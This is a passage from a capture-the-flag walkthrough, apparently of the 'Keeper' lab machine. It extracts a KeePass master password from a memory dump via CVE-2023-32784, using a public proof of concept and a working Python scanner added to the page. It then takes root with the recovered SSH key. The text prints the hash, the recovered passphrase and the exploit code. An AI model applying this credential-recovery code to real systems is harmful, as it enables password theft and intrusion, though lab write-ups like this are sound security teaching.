
b) Post Exploitation
At this stage we already have access to the exploited machine and want to make sure that access survives any modifications and changes made to the system. During this phase we may try to escalate our privileges to obtain the highest possible rights and hunt for sensitive data such as credentials or other data worth protecting (pillaging). Often the output of post-exploitation is the input to the lateral movement process described next.
Unzipping the archive to reveal its contents:
lnorgaard@keeper:~$ unzip RT30000.zip
Archive:  RT30000.zip
  inflating: KeePassDumpFull.dmp
 extracting: passcodes.kdbx
Extracting a crackable hash from the database with keepass2john:
$keepass$*2*60000*0*5d7b4747e5a278d572fb0a66fe187ae5d74a0e2f56a2aaaf4c4f2b8ca342597d*5b7ec1cf6889266a388abe398d7990a294bf2a581156f7a7452b4074479bdea7*08500fa5a52622ab89b0addfedd5a05c*411593ef0846fc1bb3db4f9bab515b42e58ade0c25096d15f090b0fe10161125*a4842b416f14723513c5fb704a2f49024a70818e786f07e68e82a6d3d7cdbcdc
Brute-forcing this hash led nowhere: the 60000 field is the key-transformation round count, so every guess is expensive, and the master password turns out not to be in any wordlist.
Found a POC that extracts the master password from a KeePass memory dump (the KeePass 2.x master-password leak, CVE-2023-32784):
https://github.com/matro7sh/keepass-dump-masterkey
python3 Downloads/poc.py Downloads/KeePassDumpFull.dmp
2024-02-21 21:39:20,860 [.] [main] Opened Downloads/KeePassDumpFull.dmp
Possible password: ●,dgr●d med fl●de
Possible password: ●ldgr●d med fl●de
Possible password: ●`dgr●d med fl●de
Possible password: ●-dgr●d med fl●de
Possible password: ●'dgr●d med fl●de
Possible password: ●]dgr●d med fl●de
Possible password: ●Adgr●d med fl●de
Possible password: ●Idgr●d med fl●de
Possible password: ●:dgr●d med fl●de
Possible password: ●=dgr●d med fl●de
Possible password: ●_dgr●d med fl●de
Possible password: ●cdgr●d med fl●de
Possible password: ●Mdgr●d med fl●de
The first character is never recovered by this technique, the second position has many competing candidates, and the ● placeholders at the other positions line up with characters the tool could not print (the ø of the Danish phrase). Searching with googler for the recoverable fragment "dgr d med fl de" gives the passphrase.
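As an added example (this is not the page's POC and not the matro7sh code), the script below re-implements the scanning step so the ambiguity in the POC output above is easy to understand. The bug the POC relies on is CVE-2023-32784: vulnerable KeePass 2.x builds kept, for every keystroke in the master-password box, a managed string of (n-1) U+25CF bullets followed by the n-th character, and never scrubbed them, so a dump contains "●x", "●●y", "●●●z" and so on. Everything below that builds a dump is a constructed stand-in (the simulate_keepass_leak helper and its noise bytes are assumptions for the demo, not KeePass's real heap layout); find_leaked_fragments and reconstruct work on a real .dmp file as well.

```python
"""Scan a KeePass 2.x process dump for leaked master-password fragments.

Added example, not the page's or the POC author's code.  Implements the
CVE-2023-32784 recovery idea: each leaked string is k bullets (U+25CF)
followed by one character, revealing password position k+1.  Position 1
is never leaked, and stray "●?" pairs elsewhere in memory show up as extra
candidates for position 2, which is the ambiguity seen in the POC output.
"""
from __future__ import annotations

import re
import sys
from collections import defaultdict
from pathlib import Path

BULLET = "\u25cf"  # ● as KeePass stores it (UTF-16LE bytes CF 25)
# One or more UTF-16LE bullets followed by a single UTF-16LE code unit.
FRAG_RE = re.compile(rb"((?:\xcf\x25)+)(..)", re.DOTALL)


def find_leaked_fragments(dump: bytes) -> dict[int, set[str]]:
    """Map 1-based password position -> set of candidate characters."""
    candidates: dict[int, set[str]] = defaultdict(set)
    for m in FRAG_RE.finditer(dump):
        n_bullets = len(m.group(1)) // 2
        try:
            ch = m.group(2).decode("utf-16-le")
        except UnicodeDecodeError:  # lone surrogate: not a real character
            continue
        if not ch.isprintable():  # NUL padding, control bytes
            continue
        candidates[n_bullets + 1].add(ch)
    return dict(candidates)


def reconstruct(candidates: dict[int, set[str]]) -> str:
    """Render the best guess: '?' for position 1 (never leaked) and for any
    position without a fragment, the character where it is unambiguous, and
    {a|b} where several fragments compete for the same position."""
    if not candidates:
        return ""
    out = ["?"]
    for pos in range(2, max(candidates) + 1):
        chars = sorted(candidates.get(pos, ()))
        if len(chars) == 1:
            out.append(chars[0])
        elif not chars:
            out.append("?")
        else:
            out.append("{" + "|".join(chars) + "}")
    return "".join(out)


def simulate_keepass_leak(password: str, noise: bytes = b"") -> bytes:
    """Constructed stand-in for a real dump (assumption: only the leaked
    strings are mimicked, each padded with the given noise bytes)."""
    chunks = []
    for n in range(2, len(password) + 1):
        frag = (BULLET * (n - 1) + password[n - 1]).encode("utf-16-le")
        chunks.append(noise + frag + b"\x00\x00" + noise)
    return b"".join(chunks)


if __name__ == "__main__":
    # Usage: python3 scan.py KeePassDumpFull.dmp  (no argument runs the demo)
    if len(sys.argv) > 1:
        image = Path(sys.argv[1]).read_bytes()
    else:
        image = simulate_keepass_leak("rødgrød med fløde", noise=b"\x00\xcfA\x25")
        # A stray "●," from unrelated memory, constructed to show the ambiguity.
        image += (BULLET + ",").encode("utf-16-le")
    found = find_leaked_fragments(image)
    for pos in sorted(found):
        print(pos, "".join(sorted(found[pos])))
    print("Best guess:", reconstruct(found))
```

Run against the demo it prints one candidate per position except position 2, where the stray pair competes with the real ø, and a best guess of "?{,|ø}dgrød med fløde"; run against a real dump it prints whatever fragments survive in that process image, and the first character still has to be guessed or searched for, as the page does.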
Log in to the .kdbx using the passphrase "rødgrød med fløde".
With KeePassXC, locate the entry under Network > keeper.htb.

Root credentials and RSA key
The entry holds the root credentials and an RSA private key in PuTTY format.
Convert the PuTTY key file (.ppk) to OpenSSH format with puttygen.
Log in via SSH as root using the root credentials and the converted OpenSSH RSA key.
Read root.txt.